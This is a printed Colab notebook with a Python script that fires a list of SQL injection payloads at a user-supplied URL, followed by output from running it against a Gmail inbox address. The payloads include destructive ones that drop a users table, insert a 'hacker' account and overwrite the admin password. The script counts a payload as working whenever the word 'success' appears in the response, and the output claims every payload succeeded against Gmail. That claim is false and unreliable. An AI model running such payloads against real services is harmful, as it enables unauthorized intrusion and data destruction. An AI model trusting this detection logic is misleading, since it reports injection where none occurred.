10/7/24, 5:19 PM Untitled0.
ipynb - Colab
import requests
payloads = ["'",
"''",
"`",
"``",
",",
"/",
"//",
"\\",
";",
"' or ",
"-- or #",
"' OR '1",
"' OR 1 -- -",
" OR 1 = 1 -- -",
"' OR '' = '",
"'='",
"'LIKE'",
"'=0--+",
" OR 1=1",
"' OR 'x'='x",
"' AND id IS NULL; --",
"'''''''''''''UNION SELECT '2",
"%00",
"/*…*/",
"1' ORDER BY 1--+",
"1' ORDER BY 2--+",
"1' ORDER BY 3--+",
"1' ORDER BY 1,2--+",
"1' ORDER BY 1,2,3--+",
"' OR 1=1 --",
"'; DROP TABLE users; --",
"'; INSERT INTO users (username, password) VALUES ('hacker', 'password'); --",
"'; UPDATE users SET password='hacker_password' WHERE username='admin'; --",
"'; SELECT * FROM users WHERE 1=1; --",
"'; SELECT * FROM users WHERE username='admin' AND password LIKE '%'; --"
]
def test_payload(url, payload):
# Replace 'parameter' with the actual parameter you want to test
injected_url = url + "?parameter=" + payload
response = requests.get(injected_url)
# Check if the payload was successful by looking for a specific string in the response
if "success" in response.text:
print(f"Payload '{payload}' was successful!")
else:
print(f"Payload '{payload}' was not successful.")
def automate_payloads():
# Get user input for the target URL
url = input("Enter the target URL: ")
for payload in payloads:
test_payload(url, payload)
# Example usage with user input
automate_payloads()
Enter the target URL: https://mail.google.com/mail/u/0/?tab=rm&ogbl#inbox
Payload ''' was successful!
Payload '''' was successful!
Payload '`' was successful!
Payload '``' was successful!
Payload ',' was successful!
Payload '/' was successful!
Payload '//' was successful!
Payload '\' was successful!
Payload ';' was successful!
Payload '' or ' was successful!
Payload '-- or #' was successful!
Payload '' OR '1' was successful!
Payload '' OR 1 -- -' was successful!
Payload ' OR 1 = 1 -- -' was successful!
Payload '' OR '' = '' was successful!
Payload ''='' was successful!
Payload ''LIKE'' was successful!
Payload ''=0--+' was successful!
Payload ' OR 1=1' was successful!
Payload '' OR 'x'='x' was successful!
Payload '' AND id IS NULL; --' was successful!
Payload ''''''''''''''UNION SELECT '2' was successful!
https://colab.research.google.com/drive/1ymFr8PcZzpipmFBpG4X6DLnj6etqGyN0#scrollTo=PUa4ZKYCwyV7&printMode=true 1/2
�10/7/24, 5:19 PM Untitled0.ipynb - Colab
Payload '%00' was successful!
Payload '/*…*/' was successful!
Payload '1' ORDER BY 1--+' was successful!
Payload '1' ORDER BY 2--+' was successful!
Payload '1' ORDER BY 3--+' was successful!
Payload '1' ORDER BY 1,2--+' was successful!
Payload '1' ORDER BY 1,2,3--+' was successful!
Payload '' OR 1=1 --' was successful!
Payload ''; DROP TABLE users; --' was successful!
Payload ''; INSERT INTO users (username, password) VALUES ('hacker', 'password'); --' was successful!
Payload ''; UPDATE users SET password='hacker_password' WHERE username='admin'; --' was successful!
Payload ''; SELECT * FROM users WHERE 1=1; --' was successful!
Payload ''; SELECT * FROM users WHERE username='admin' AND password LIKE '%'; --' was successful!
https://colab.research.google.com/drive/1ymFr8PcZzpipmFBpG4X6DLnj6etqGyN0#scrollTo=PUa4ZKYCwyV7&printMode=true 2/2
